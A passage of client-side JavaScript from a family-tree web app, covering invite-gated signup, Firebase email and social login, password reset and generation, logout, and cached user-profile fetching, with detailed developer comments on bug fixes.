                loadTrustInfo(personId, appState.currentTreeId);
            } catch (error) {
                console.error('Error removing verification:', error);
                alert(error.message || 'Could not remove verification. Please try again.');
            }
        }

        // --- AUTHENTICATION FUNCTIONS ---

        // Q5: derives the signup form's invite-aware state from FEATURES.requireInvite
        // and the URL's ?invite=TOKEN. Called whenever the signup form is shown
        // (from switchAuthTab below), so the banner is consistent regardless of
        // how the user got there (/signup, /login?form=signup, manual tab click).
        function applyInviteState() {
            const banner = document.getElementById('signup-invite-banner');
            const submitButton = document.querySelector('#signup-form button[type="submit"]');
            // The pre-existing B20 yellow banner inside the form (gated on
            // !FEATURES.signupTabVisible). Hide when we render our stronger
            // "Invitation required" message so we don't double-message.
            const b20Banner = document.querySelector('#signup-form > .border-yellow-300');
            if (!banner) return;

            const inviteToken = getInviteCodeFromUrl();

            if (inviteToken) {
                // Has a token: hydrate (renders the green pill or a red error
                // inline). Skip duplicate fetches if we already hydrated this
                // exact token in this session.
                if (!pendingInvite || pendingInvite.token !== inviteToken) {
                    hydrateInviteContext(inviteToken);
                }
                if (submitButton) submitButton.disabled = false;
                if (b20Banner) b20Banner.style.display = '';
                return;
            }

            if (FEATURES.requireInvite) {
                banner.innerHTML = `
                    <div class="rounded-md border border-yellow-300 bg-yellow-50 p-3 text-sm text-yellow-900">
                        <p class="font-semibold mb-1">Invitation required</p>
                        <p class="text-xs">Ebiwawa is in invite-only beta. You'll need an invitation link from a current family member to create an account. If you have one, paste it into your browser. Otherwise, contact <a href="mailto:info@ebiwawa.com" class="underline">info@ebiwawa.com</a>.</p>
                    </div>`;
                banner.classList.remove('hidden');
                if (submitButton) submitButton.disabled = true;
                if (b20Banner) b20Banner.style.display = 'none';
            } else {
                // Gate off, no token: clear any stale dynamic banner.
                banner.innerHTML = '';
                banner.classList.add('hidden');
                if (submitButton) submitButton.disabled = false;
                if (b20Banner) b20Banner.style.display = '';
            }
        }

        function switchAuthTab(tab) {
            // Tab buttons exist only when FEATURES.signupTabVisible is true. During
            // invite-only the "Have an invite code?" link calls this with tab='signup'
            // to reveal the signup form even though no tab UI is present.
            const loginTab = document.getElementById('login-tab');
            const signupTab = document.getElementById('signup-tab');
            const loginContainer = document.getElementById('login-form-container');
            const signupContainer = document.getElementById('signup-form-container');

            const hasTabs = loginTab && signupTab;
            // B31: the "Have an invite code? Create your account" prompt makes
            // sense on the login view (call-to-action to switch to signup) but
            // is meaningless once the user is on the signup form — they're
            // already there. Hide it whenever signup is active.
            const invitePrompt = document.getElementById('invite-code-prompt');

            if (tab === 'login') {
                if (hasTabs) {
                    loginTab.style.borderBottom = '3px solid #FCAB10';
                    loginTab.style.color = '#FCAB10';
                    loginTab.classList.remove('text-gray-500');
                    signupTab.style.borderBottom = 'none';
                    signupTab.style.color = '#6B7280';
                    signupTab.classList.add('text-gray-500');
                }
                loginContainer.classList.remove('hidden');
                signupContainer.classList.add('hidden');
                if (invitePrompt) invitePrompt.classList.remove('hidden');
            } else {
                if (hasTabs) {
                    signupTab.style.borderBottom = '3px solid #FCAB10';
                    signupTab.style.color = '#FCAB10';
                    signupTab.classList.remove('text-gray-500');
                    loginTab.style.borderBottom = 'none';
                    loginTab.style.color = '#6B7280';
                    loginTab.classList.add('text-gray-500');
                }
                signupContainer.classList.remove('hidden');
                loginContainer.classList.add('hidden');
                if (invitePrompt) invitePrompt.classList.add('hidden');
                // Q5: re-apply the invite-aware banner state each time signup
                // is shown — handles direct /signup nav, /login?form=signup
                // via the Landing's "Get started" CTA, and manual tab clicks.
                applyInviteState();
            }
        }

        async function handleLogin(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('login-error');
            errorDiv.textContent = '';

            const email = document.getElementById('login-email').value.trim();
            const password = document.getElementById('login-password').value;

            try {
                const userCredential = await signInWithEmailAndPassword(auth, email, password);
                // Auth state listener will handle the rest
            } catch (error) {
                console.error("Login error:", error);
                // Newer Firebase Auth ("email enumeration protection" on) consolidates
                // wrong-password / wrong-email / unknown-user into a single
                // auth/invalid-login-credentials code so attackers can't enumerate
                // valid emails. Treat all such cases the same way: a generic
                // "credentials don't match" message. We also check error.message
                // for the raw 'INVALID_LOGIN_CREDENTIALS' string because Firebase
                // JS SDK v8 sometimes surfaces it without normalizing to a code.
                const msg = String(error.message || '');
                const isBadCredentials = (
                    error.code === 'auth/wrong-password' ||
                    error.code === 'auth/invalid-login-credentials' ||
                    error.code === 'auth/invalid-credential' ||
                    msg.includes('INVALID_LOGIN_CREDENTIALS') ||
                    msg.includes('INVALID_PASSWORD') ||
                    msg.includes('EMAIL_NOT_FOUND')
                );
                if (isBadCredentials) {
                    // Best-effort hint: if the account was created via a social provider,
                    // suggest the right sign-in method instead of "wrong password."
                    fetchSignInMethodsForEmail(auth, email)
                        .then(methods => {
                            if (methods.includes('google.com')) {
                                errorDiv.textContent = "This account was created with Google. Please use 'Continue with Google' to sign in.";
                            } else if (methods.includes('facebook.com')) {
                                errorDiv.textContent = "This account was created with Facebook. Please use 'Continue with Facebook' to sign in.";
                            } else {
                                errorDiv.textContent = "Email or password is incorrect. Please try again or reset your password.";
                            }
                        })
                        .catch(() => {
                            errorDiv.textContent = "Email or password is incorrect. Please try again or reset your password.";
                        });
                } else if (error.code === 'auth/user-not-found') {
                    errorDiv.textContent = "No account found with this email. Please sign up.";
                } else if (error.code === 'auth/too-many-requests') {
                    errorDiv.textContent = "Too many failed attempts. Please wait a moment and try again.";
                } else if (error.code === 'auth/network-request-failed') {
                    errorDiv.textContent = "Network error. Check your connection and try again.";
                } else if (error.code === 'auth/user-disabled') {
                    errorDiv.textContent = "This account has been disabled.";
                } else {
                    // Friendly fallback — never dump raw Firebase JSON to the user.
                    errorDiv.textContent = "Sign-in failed. Please check your email and password and try again.";
                }
            }
        }

        // Forgot password: triggers Firebase to email a password-reset link.
        // The email contains a /__/auth/action URL that Firebase Hosting handles
        // on app.ebiwawa.com (the custom auth domain we configured earlier).
        async function handleForgotPassword(event) {
            if (event) event.preventDefault();
            const errorDiv = document.getElementById('login-error');
            errorDiv.textContent = '';
            const emailInput = document.getElementById('login-email');
            let email = emailInput ? emailInput.value.trim() : '';
            if (!email) {
                email = (prompt('Enter your email and we\'ll send a reset link:') || '').trim();
            }
            if (!email) return;
            if (!email.match(/^[^\s@]+@[^\s@]+\.[^\s@]+$/)) {
                errorDiv.textContent = 'Please enter a valid email address.';
                return;
            }
            try {
                await sendPasswordResetEmail(auth, email);
                errorDiv.style.color = '#15803d'; // green
                errorDiv.textContent = `If an account exists for ${email}, a password-reset link is on its way. Check your inbox (and spam folder).`;
                // Reset color after a few seconds in case the user types again
                setTimeout(() => { errorDiv.style.color = ''; }, 8000);
            } catch (error) {
                console.error('Password reset error:', error);
                // Don't reveal whether the email exists (matches Firebase's own
                // email-enumeration-protection posture).
                errorDiv.style.color = '#15803d';
                errorDiv.textContent = `If an account exists for ${email}, a password-reset link is on its way. Check your inbox (and spam folder).`;
                setTimeout(() => { errorDiv.style.color = ''; }, 8000);
            }
        }

        // Cryptographically-strong random password. Avoids visually
        // ambiguous chars (0/O, 1/l/I) so users typing from a screen
        // (e.g., transcribing from Show → paper) don't misread.
        function suggestStrongPassword() {
            const upper = 'ABCDEFGHJKLMNPQRSTUVWXYZ';
            const lower = 'abcdefghijkmnpqrstuvwxyz';
            const digit = '23456789';
            const symbol = '!@#$%^&*-_=+?';
            const all = upper + lower + digit + symbol;
            const length = 20;
            const buf = new Uint32Array(length + 4);
            crypto.getRandomValues(buf);
            // Guarantee at least one of each class so any minlength +
            // "at least one symbol" server-side rule passes.
            let chars = [
                upper[buf[0] % upper.length],
                lower[buf[1] % lower.length],
                digit[buf[2] % digit.length],
                symbol[buf[3] % symbol.length],
            ];
            for (let i = 4; i < length; i++) {
                chars.push(all[buf[i] % all.length]);
            }
            // Fisher-Yates shuffle so the class-anchored chars aren't
            // always at the front.
            const shuf = new Uint32Array(length);
            crypto.getRandomValues(shuf);
            for (let i = length - 1; i > 0; i--) {
                const j = shuf[i] % (i + 1);
                [chars[i], chars[j]] = [chars[j], chars[i]];
            }
            const password = chars.join('');
            const pwInput = document.getElementById('signup-password');
            const confInput = document.getElementById('signup-confirm-password');
            if (pwInput) pwInput.value = password;
            if (confInput) confInput.value = password;
            // Reveal so the user can copy it into a password manager if
            // their browser didn't offer to save. Auto-hide after 12s.
            if (pwInput) {
                pwInput.type = 'text';
                const toggle = document.getElementById('signup-password-toggle');
                if (toggle) toggle.textContent = 'Hide';
                clearTimeout(suggestStrongPassword._hideTimer);
                suggestStrongPassword._hideTimer = setTimeout(() => {
                    if (pwInput.type === 'text') {
                        pwInput.type = 'password';
                        if (toggle) toggle.textContent = 'Show';
                    }
                }, 12000);
            }
        }

        function toggleSignupPasswordVisibility() {
            const pwInput = document.getElementById('signup-password');
            const toggle = document.getElementById('signup-password-toggle');
            if (!pwInput) return;
            const showing = pwInput.type === 'text';
            pwInput.type = showing ? 'password' : 'text';
            if (toggle) toggle.textContent = showing ? 'Show' : 'Hide';
        }

        async function handleSignup(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('signup-error');
            errorDiv.textContent = '';

            const email = document.getElementById('signup-email').value.trim();
            const firstName = document.getElementById('signup-first-name').value.trim();
            const lastName = document.getElementById('signup-last-name').value.trim();
            const middleName = document.getElementById('signup-middle-name').value.trim();
            const password = document.getElementById('signup-password').value;
            const confirmPassword = document.getElementById('signup-confirm-password').value;

            // Validation
            if (!email || !email.match(/^[^\s@]+@[^\s@]+\.[^\s@]+$/)) {
                errorDiv.textContent = "Please enter a valid email address";
                return;
            }
            if (!firstName || firstName.length < 2) {
                errorDiv.textContent = "First name must be at least 2 characters";
                return;
            }
            if (!lastName || lastName.length < 2) {
                errorDiv.textContent = "Last name must be at least 2 characters";
                return;
            }
            if (password.length < 10) {
                errorDiv.textContent = "Password must be at least 10 characters";
                return;
            }
            if (password !== confirmPassword) {
                errorDiv.textContent = "Passwords do not match";
                return;
            }

            // Q5: if the gate is on, signups without a validated invite are
            // a non-starter. The backend will refuse to create the Neo4j
            // User node anyway; checking here short-circuits before Firebase
            // creates an orphan account that the B24 janitor would later sweep.
            if (FEATURES.requireInvite && !pendingInvite) {
                errorDiv.textContent = "An invitation is required to sign up. Please use the invitation link you received.";
                return;
            }

            // Q5: when an invite is in play, the backend enforces email
            // match too (line 212 of routes/invites.py). Catch the mismatch
            // client-side so the user doesn't burn a Firebase account.
            if (pendingInvite && pendingInvite.recipientEmail && pendingInvite.recipientEmail.toLowerCase() !== email.toLowerCase()) {
                errorDiv.textContent = `This invitation was sent to ${pendingInvite.recipientEmail}. Please sign up using that email address.`;
                return;
            }

            try {
                // Create Firebase account
                const userCredential = await createUserWithEmailAndPassword(auth, email, password);

                // Set display name — v9 modular: updateProfile is a top-level
                // free function, not a method on user. See 2026-10-09 Path A
                // import block comment for the full regression history.
                await updateProfile(userCredential.user, {
                    displayName: `${firstName} ${middleName ? middleName + ' ' : ''}${lastName}`
                });

                // B34: fire-and-forget verification email. We don't gate
                // onboarding on it for invite-only — users are already
                // socially vetted by the inviter — but we want the email to
                // arrive so they can verify whenever, and so the verified
                // flag becomes a signal we can lean on once public signup
                // opens. Failures are logged, not surfaced (the user is
                // already mid-onboarding; we don't want to interrupt).
                // v9 modular: sendEmailVerification is a top-level free function.
                sendEmailVerification(userCredential.user).catch((err) => {
                    console.warn('sendEmailVerification failed:', err && err.code);
                });

                // Store data for onboarding
                onboardingState.firebaseUser = userCredential.user;
                onboardingState.authToken = await userCredential.user.getIdToken();
                onboardingState.data.email = email;
                onboardingState.data.userFirstName = firstName;
                onboardingState.data.userMiddleName = middleName;
                onboardingState.data.userLastName = lastName;

                // Q5: consume the invite token (if any) now that we have a
                // Firebase ID token. This creates the Neo4j User node + joins
                // them to the inviter's tree in one server-side call. After
                // this, ensure_neo4j_user_exists will resolve their User node
                // even if the gate is on. Failures are surfaced (the user is
                // signed in to Firebase but the platform-side activation
                // didn't land — they'd hit the "account not activated" state).
                if (pendingInvite && pendingInvite.token) {
                    try {
                        await apiFetch(`${API_BASE_URL}/invites/accept`, {
                            method: 'POST',
                            body: { token: pendingInvite.token },
                        });
                        onboardingState.joinedExistingTree = true;
                        pendingInvite = null;
                        // Q5 polish: strip BOTH ?invite= AND ?token= from the
                        // URL. The race between createUserWithEmailAndPassword's
                        // synchronous onAuthStateChanged firing and this code
                        // path can cause the /signup signed-in branch to run
                        // first, which mirrors ?invite= into ?token=. Both
                        // params need to go, or a later reload would re-fire
                        // showInviteAcceptanceUI off the stray ?token=.
                        try {
                            const _cleanUrl = new URL(window.location);
                            _cleanUrl.searchParams.delete('invite');
                            _cleanUrl.searchParams.delete('token');
                            window.history.replaceState({}, '', _cleanUrl.pathname + (_cleanUrl.search || ''));
                        } catch (_e) { /* noop */ }
                    } catch (acceptErr) {
                        console.warn('Invite accept failed after signup:', acceptErr);
                        // 2026-10-11: specific handling for 429 daily_cap_reached
                        // from accept_invite's new counter check (shipped
                        // db-app e9a57f8 → prod api:e9a57f8). Three things
                        // need to happen in this specific case:
                        //   1. Show a friendly cap-reached message on the
                        //      signup form (backend's error message is
                        //      already user-friendly; use it as-is)
                        //   2. Delete the orphan Firebase Auth account that
                        //      createUserWithEmailAndPassword just created —
                        //      otherwise the user retrying tomorrow would hit
                        //      "auth/email-already-in-use" (same shape as the
                        //      2026-10-09 §D.1 smoketest1 incident), and the
                        //      B24 janitor's 30-day sweep is slower than
                        //      daily counter reset
                        //   3. Return BEFORE advancing to onboarding — the
                        //      invite wasn't consumed, so backend's
                        //      signup_gate_error would reject onboarding
                        //      completion with a less helpful error
                        if (acceptErr && acceptErr.status === 429 && acceptErr.reason === 'daily_cap_reached') {
                            try {
                                await userCredential.user.delete();
                            } catch (_delErr) {
                                // Best-effort — if delete fails, B24 janitor
                                // sweeps the orphan after 30 days.
                                console.warn('Cleanup of orphan Firebase account failed:', _delErr);
                            }
                            errorDiv.textContent = acceptErr.message || "We've hit today's signup limit. Please try again tomorrow.";
                            // Reset the submit button state so user sees the error
                            // and can try again tomorrow without a page reload.
                            const submitBtn = event.target.querySelector('button[type="submit"]');
                            if (submitBtn) {
                                submitBtn.disabled = false;
                                submitBtn.textContent = 'Sign Up';
                            }
                            return;
                        }
                        // All other failures: don't block onboarding — the user
                        // can still complete their profile. If the backend is in
                        // REQUIRE_INVITE mode and this failed, they'll see "not
                        // activated" on the next backend call and can retry.
                    }
                }

                // Start onboarding at step 1 (profile data, not account creation)
                onboardingState.currentStep = 1;
                saveOnboardingProgress();

                // Show onboarding wizard. Idempotent against renderApp() — if
                // onAuthStateChanged has already mounted the wizard (because
                // Firebase fires that listener inside createUserWithEmailAndPassword's
                // await window), we don't re-write innerHTML and just (re)render
                // Step 1 into the existing #onboarding-steps. Without this guard,
                // both this code path AND renderApp's wizard branch run, producing
                // a double-render flash.
                if (!document.getElementById('onboarding-wizard')) {
                    document.getElementById('app').innerHTML = OnboardingWizard();
                }
                renderOnboardingStep(1);
                updateProgress();

            } catch (error) {
                console.error("Signup error:", error);
                if (error.code === 'auth/email-already-in-use') {
                    // 2026-10-14: covers two recovery scenarios that look the
                    // same from the signup form:
                    //   (A) Previous signup completed normally — user forgot
                    //       they have an account. Sign in lands them on
                    //       Dashboard.
                    //   (B) Previous signup aborted mid-wizard (user closed
                    //       the tab OR hit the 429 daily_cap_reached on
                    //       /onboarding/complete — the un-invited path
                    //       preserves the Firebase account by design, see
                    //       app.js:20857). Sign in with no Neo4j User routes
                    //       them back into onboarding — see onAuthStateChanged
                    //       signed-in branch which checks hasTree + routes to
                    //       OnboardingWizard when no User node backs the UID.
                    //
                    // Both resume paths work with the same action: tap Login
                    // tab + sign in with original password. switchAuthTab is
                    // the universal entry whether the tab is visible (post-
                    // launch) or not (pre-launch "Back to login" link).
                    // Use innerHTML so the inline "sign in" link can be a
                    // real tappable anchor. We're writing fixed strings +
                    // the user's email is NOT interpolated here, so no XSS.
                    const loginLink = `<a href="#" onclick="event.preventDefault(); switchAuthTab('login');" class="font-medium underline">sign in</a>`;
                    const forgotLink = `<a href="#" onclick="event.preventDefault(); switchAuthTab('login'); setTimeout(function(){ var l=document.getElementById('forgot-password-link'); if(l){l.click();} }, 50);" class="font-medium underline">Forgot password?</a>`;
                    // 2026-10-14: no facebook.com branch — Facebook sign-in has
                    // been off since the 2026-05-21 auth redesign (FEATURES.
                    // facebookSignIn: false). Nobody with a post-redesign
                    // account can have facebook.com as a sign-in method.
                    fetchSignInMethodsForEmail(auth, email)
                        .then(methods => {
                            if (methods.includes('google.com')) {
                                errorDiv.innerHTML = `Looks like you've already started — ${loginLink} and tap 'Continue with Google' to pick up where you left off.`;
                            } else if (methods.includes('password')) {
                                errorDiv.innerHTML = `Looks like you've already started — ${loginLink} to pick up where you left off. ${forgotLink} if you can't remember your password.`;
                            } else {
                                errorDiv.innerHTML = `Looks like you've already started — ${loginLink} to pick up where you left off.`;
                            }
                        })
                        .catch(() => {
                            errorDiv.innerHTML = `Looks like you've already started — ${loginLink} to pick up where you left off.`;
                        });
                } else if (error.code === 'auth/weak-password') {
                    errorDiv.textContent = "Password is too weak. Please use a stronger password.";
                } else if (error.code === 'auth/invalid-email') {
                    errorDiv.textContent = "Please enter a valid email address.";
                } else if (error.code === 'auth/too-many-requests') {
                    errorDiv.textContent = "Too many attempts. Please wait a moment and try again.";
                } else if (error.code === 'auth/network-request-failed') {
                    errorDiv.textContent = "Network error. Check your connection and try again.";
                } else {
                    // Friendly fallback — never dump raw Firebase JSON to the user.
                    errorDiv.textContent = "Sign-up failed. Please try again.";
                }
            }
        }

        function setSignInLoading(provider, loading) {
            const btn = document.getElementById(`${provider}-signin-btn`);
            const text = document.getElementById(`${provider}-signin-text`);
            const spinner = document.getElementById(`${provider}-spinner`);
            const icon = document.getElementById(`${provider}-icon`);
            const otherProvider = provider === 'google' ? 'facebook' : 'google';
            const otherBtn = document.getElementById(`${otherProvider}-signin-btn`);

            if (!btn) return;

            if (loading) {
                btn.disabled = true;
                btn.classList.add('opacity-75', 'cursor-wait');
                if (text) text.textContent = 'Signing in...';
                if (spinner) spinner.classList.remove('hidden');
                if (icon) icon.classList.add('opacity-50');
                if (otherBtn) { otherBtn.disabled = true; otherBtn.classList.add('opacity-50', 'pointer-events-none'); }
            } else {
                btn.disabled = false;
                btn.classList.remove('opacity-75', 'cursor-wait');
                if (text) text.textContent = `Continue with ${provider.charAt(0).toUpperCase() + provider.slice(1)}`;
                if (spinner) spinner.classList.add('hidden');
                if (icon) icon.classList.remove('opacity-50');
                if (otherBtn) { otherBtn.disabled = false; otherBtn.classList.remove('opacity-50', 'pointer-events-none'); }
            }
        }

        // Shared IDP post-signin handler. Applies to Google + Facebook.
        // Two failure modes we're closing here (2026-07-23):
        //   1. IDP email doesn't match the invited email → the user gets
        //      Firebase-authed under a different identity, invite stays
        //      pending, they wander into the app disconnected from any
        //      inviter. Sign them out + show the same copy the email +
        //      password path uses so they know to retry with the right
        //      Google account (or use the email form).
        //   2. IDP email DOES match invited email but /invites/accept was
        //      never called → invite stays pending, no MEMBER_OF edge,
        //      no auto-relationship. Fix: consume the invite here just
        //      like handleSignup does, so both signup paths end at the
        //      same downstream state.
        // Returns true if the app should continue (auth state listener
        // takes it from here); false if we handled a failure state and
        // the caller should stop.
        async function _handleIdpPostSignin(providerLabel, result) {
            const user = result && result.user;
            if (!user) return true;

            // Invite email-match gate. Runs BEFORE any Firebase-side
            // work so a mismatched Google account doesn't create a
            // half-provisioned Neo4j user.
            if (pendingInvite && pendingInvite.recipientEmail) {
                const inviteEmail = String(pendingInvite.recipientEmail).toLowerCase();
                const idpEmail = String(user.email || '').toLowerCase();
                if (idpEmail !== inviteEmail) {
                    // Sign out immediately + surface actionable copy.
                    // Firebase leaves the account (created if new) alive
                    // in Firebase Auth; the B24 janitor will sweep it
                    // in 30 days if no Neo4j User backs it.
                    try { await signOut(auth); } catch (_) {}
                    const errorDiv = document.getElementById('login-error') || document.getElementById('signup-error');
                    if (errorDiv) {
                        errorDiv.textContent = `This invitation was sent to ${pendingInvite.recipientEmail}. Sign in with that ${providerLabel} account, or use the email form and sign up with ${pendingInvite.recipientEmail}.`;
                        errorDiv.classList.remove('hidden');
                    }
                    return false;
                }
            }

            // Consume the invite server-side. This is the same call
            // handleSignup makes after createUserWithEmailAndPassword —
            // creates the Neo4j User node, adds them to the inviter's
            // tree via MEMBER_OF, auto-creates the B41 Person→Person
            // relationship from the invite's relationship hint, and
            // flips the Invitation status to 'accepted'.
            if (pendingInvite && pendingInvite.token) {
                try {
                    // Give the auth listener a fresh token to attach.
                    // signInWithPopup returns before onAuthStateChanged
                    // has fully propagated; grabbing the ID token here
                    // ensures apiFetch has one to send.
                    appState.authToken = await user.getIdToken();
                    await apiFetch(`${API_BASE_URL}/invites/accept`, {
                        method: 'POST',
                        body: { token: pendingInvite.token },
                    });
                    onboardingState.joinedExistingTree = true;
                    pendingInvite = null;
                    // Strip ?invite= + ?token= so a later reload doesn't
                    // re-fire showInviteAcceptanceUI. Same treatment as
                    // handleSignup's post-accept cleanup.
                    try {
                        const _cleanUrl = new URL(window.location);
                        _cleanUrl.searchParams.delete('invite');
                        _cleanUrl.searchParams.delete('token');
                        window.history.replaceState({}, '', _cleanUrl.toString());
                    } catch (_) {}
                } catch (e) {
                    // Non-fatal — the user is Firebase-authed and can
                    // still complete onboarding, but their invite
                    // context is lost. Log for post-mortem.
                    console.error('IDP invite accept failed:', e);
                }
            }

            // Stash display name for the onboarding wizard step 1
            // prefill. Only when we have a real name (Google always
            // provides one; Facebook may not).
            if (user.displayName) {
                const parsedName = parseDisplayName(user.displayName);
                clearOnboardingProgress();
                onboardingState.data.email = user.email || '';
                onboardingState.data.userFirstName = parsedName.firstName;
                onboardingState.data.userMiddleName = parsedName.middleName;
                onboardingState.data.userLastName = parsedName.lastName;
                saveOnboardingProgress();
            }
            return true;
        }

        async function signInWithGoogle() {
            setSignInLoading('google', true);
            try {
                // Platform-branched popup vs redirect. useRedirect() returns
                // true only when Capacitor's isNativePlatform() reports the
                // app is running inside an Android/iOS WebView, where popups
                // are unreliable. Absent-Capacitor path (i.e. desktop web +
                // mobile web) stays on popup, which is better UX and what
                // real users test today.
                //
                // On redirect: signInWithRedirect() navigates the page and
                // the auth result is picked up by onAuthStateChanged after
                // the round-trip. Code after `await signInWithRedirect(...)`
                // never runs — the browser leaves this page. When Capacitor
                // lands, getRedirectResult(auth) needs to be called at app
                // start to inspect the credential (Task deferred to when
                // Capacitor is actually wired).
                if (useRedirect()) {
                    await signInWithRedirect(auth, googleProvider);
                    return;
                }
                const result = await signInWithPopup(auth, googleProvider);
                const shouldContinue = await _handleIdpPostSignin('Google', result);
                if (!shouldContinue) {
                    setSignInLoading('google', false);
                }
                // Auth state listener handles the rest on continue.
            } catch (error) {
                console.error("Google sign-in error:", error);
                setSignInLoading('google', false);
                if (error.code !== 'auth/popup-closed-by-user' && error.code !== 'auth/cancelled-popup-request') {
                    const errorDiv = document.getElementById('login-error') || document.getElementById('signup-error');
                    if (errorDiv) {
                        errorDiv.textContent = 'Google sign-in failed. Please try again.';
                        errorDiv.classList.remove('hidden');
                    }
                }
            }
        }

        async function signInWithFacebook() {
            setSignInLoading('facebook', true);
            try {
                // Same popup vs redirect branching as signInWithGoogle;
                // see comment above.
                if (useRedirect()) {
                    await signInWithRedirect(auth, facebookProvider);
                    return;
                }
                const result = await signInWithPopup(auth, facebookProvider);
                const shouldContinue = await _handleIdpPostSignin('Facebook', result);
                if (!shouldContinue) {
                    setSignInLoading('facebook', false);
                }
                // Auth state listener handles the rest on continue.
            } catch (error) {
                console.error("Facebook sign-in error:", error);
                setSignInLoading('facebook', false);
                if (error.code !== 'auth/popup-closed-by-user' && error.code !== 'auth/cancelled-popup-request') {
                    const errorDiv = document.getElementById('login-error') || document.getElementById('signup-error');
                    if (errorDiv) {
                        errorDiv.textContent = 'Facebook sign-in failed. Please try again.';
                        errorDiv.classList.remove('hidden');
                    }
                }
            }
        }

        function parseDisplayName(displayName) {
            // Parse "First Middle Last" or "First Last" into components
            const nameParts = displayName.trim().split(/\s+/);

            if (nameParts.length === 1) {
                // Single name (e.g., "Madonna")
                return {
                    firstName: nameParts[0],
                    middleName: '',
                    lastName: nameParts[0] // Use same as first name
                };
            } else if (nameParts.length === 2) {
                // First Last
                return {
                    firstName: nameParts[0],
                    middleName: '',
                    lastName: nameParts[1]
                };
            } else {
                // First Middle Last (or more)
                // Take first as firstName, last as lastName, everything in between as middleName
                return {
                    firstName: nameParts[0],
                    middleName: nameParts.slice(1, -1).join(' '),
                    lastName: nameParts[nameParts.length - 1]
                };
            }
        }

        async function logout() {
            try {
                // Stop background polling
                stopNewPostsMonitoring();
                // Prompt 17: detach the persistent chat unread listener
                // before Firebase signOut fires onAuthStateChanged. Also
                // clears the dot so any lingering UI state matches the
                // signed-out reality.
                stopUnreadIndicatorListener();

                await signOut(auth);
                // Clear app state
                appState.currentUser = null;
                appState.currentUserNeo4jId = null;
                appState.authToken = null;
                appState.isAuthenticated = false;
                appState.hasTree = false;
                // Item 16 Phase A: drop pre-logout URL state and view memory
                // so the logged-out user lands cleanly on the Landing AND a
                // subsequent login doesn't restore them to whichever view
                // they were on when they logged out. Three pieces:
                //  1. lastView in localStorage drives the post-login view
                //     restoration — clear it.
                //  2. window.history.state carries the per-view params for
                //     refresh-on-person-detail; replaceState with a fresh
                //     state object wipes it.
                //  3. URL hash (e.g. #chat-view) survives a plain
                //     replaceState('/', ...) in some browsers if the new URL
                //     doesn't *include* a hash explicitly — passing the
                //     pathname-only string ensures the hash is dropped.
                try { localStorage.removeItem('lastView'); } catch (e) { /* noop */ }
                window.history.replaceState({}, '', window.location.pathname.startsWith('/') ? '/' : '/');
                // Belt-and-suspenders: if any hash survived the replaceState,
                // strip it manually. Setting location.hash to empty leaves a
                // trailing '#' in some browsers — assigning '' to
                // location.href after pathname avoids that.
                if (window.location.hash) {
                    window.history.replaceState({}, '', '/');
                }
                renderApp();
            } catch (error) {
                console.error("Logout error:", error);
            }
        }

        // Session 2c Task 5 v3: cache /me response so offline cold launch
        // doesn't bounce a signed-in user into the onboarding wizard.
        // /me is served by Cloud Run (no Firestore mirror), so without a
        // client-side cache offline = null response = renderApp sees
        // hasTree=false + no onboardingCompleted → routes to wizard step 1.
        //
        // Cache key includes firebaseUid so a device with multiple accounts
        // signed in over time doesn't cross-contaminate. TTL is generous
        // (30 days) since the fields we cache (hasTree, onboardingCompleted,
        // neo4jUserId, user.email) don't change often. Fresh fetches on
        // reconnect update the cache. Failed fetch with a cached value
        // available serves the cached value and marks appState as
        // "restored from cache" so downstream code can degrade gracefully.
        const _ME_CACHE_KEY = 'ebw:meCache:v1';
        const _ME_CACHE_TTL_MS = 30 * 24 * 60 * 60 * 1000; // 30 days

        function _saveMeCache(response, firebaseUid) {
            if (!response || !firebaseUid) return;
            try {
                localStorage.setItem(_ME_CACHE_KEY, JSON.stringify({
                    firebaseUid,
                    response,
                    cachedAt: Date.now(),
                }));
            } catch (_) { /* localStorage quota / private mode */ }
        }
        function _loadMeCache(firebaseUid) {
            if (!firebaseUid) return null;
            try {
                const raw = localStorage.getItem(_ME_CACHE_KEY);
                if (!raw) return null;
                const cached = JSON.parse(raw);
                if (cached.firebaseUid !== firebaseUid) return null;
                if (Date.now() - cached.cachedAt > _ME_CACHE_TTL_MS) return null;
                return cached.response;
            } catch (_) { return null; }
        }

        async function fetchCurrentUser(bustCache = false) {
            const currentFirebaseUid = auth.currentUser && auth.currentUser.uid;
            try {
                const url = bustCache
                    ? `${API_BASE_URL}/me?_t=${Date.now()}`
                    : `${API_BASE_URL}/me`;
                const response = await apiFetch(url);
                appState.currentUserNeo4jId = response.neo4jUserId;
                appState.hasTree = response.hasTree;
                appState.pendingTreeRequests = response.pendingTreeRequests || [];
                appState.onboardingCompleted = !!(response.user && response.user.onboardingCompleted);
                _saveMeCache(response, currentFirebaseUid);
                return response;
            } catch (error) {
                console.error("Error fetching current user:", error);
                // Session 2c: fall back to cached /me response for offline
                // cold launch. Prevents the "airplane mode → onboarding wizard"
                // regression that would otherwise happen every time a signed-in
                // user opens the app without network.
                const cached = _loadMeCache(currentFirebaseUid);
                if (cached) {
                    appState.currentUserNeo4jId = cached.neo4jUserId;
                    appState.hasTree = cached.hasTree;
                    appState.pendingTreeRequests = cached.pendingTreeRequests || [];
                    appState.onboardingCompleted = !!(cached.user && cached.user.onboardingCompleted);
                    console.log("[fetchCurrentUser] restored from cache (network unavailable)");
                    return cached;
                }
                return null;
            }
        }

        async function fetchAndRenderMedia(personId) {
            const mediaListDiv = document.getElementById('media-list');
            if (!mediaListDiv) return;
            mediaListDiv.innerHTML = `<p class="text-text-secondary">Loading documents...</p>`;
            try {
                const mediaItems = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person/${personId}/media`);
                if (mediaItems.length === 0) {
                    mediaListDiv.innerHTML = '<p class="text-text-secondary">No documents have been uploaded for this person.</p>';
                } else {
                    mediaListDiv.innerHTML = '';
                    for (const item of mediaItems) {
                        const urlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-signed-url`, { method: 'POST', body: { filename: item.gcs_filename } });
                        const itemEl = document.createElement('a');
                        itemEl.href = urlResponse.signed_url;
                        itemEl.target = "_blank";
                        itemEl.className = "block p-4 border rounded-md bg-surface hover:bg-gray-50";
                        itemEl.innerHTML = `<p class="font-semibold text-primary">${escapeHtml(item.title)}</p><p class="text-sm text-text-secondary">${escapeHtml(item.description || '')}</p>`;
                        mediaListDiv.appendChild(itemEl);
                    }
                }
            } catch (error) {
                console.error("Error fetching media:", error);
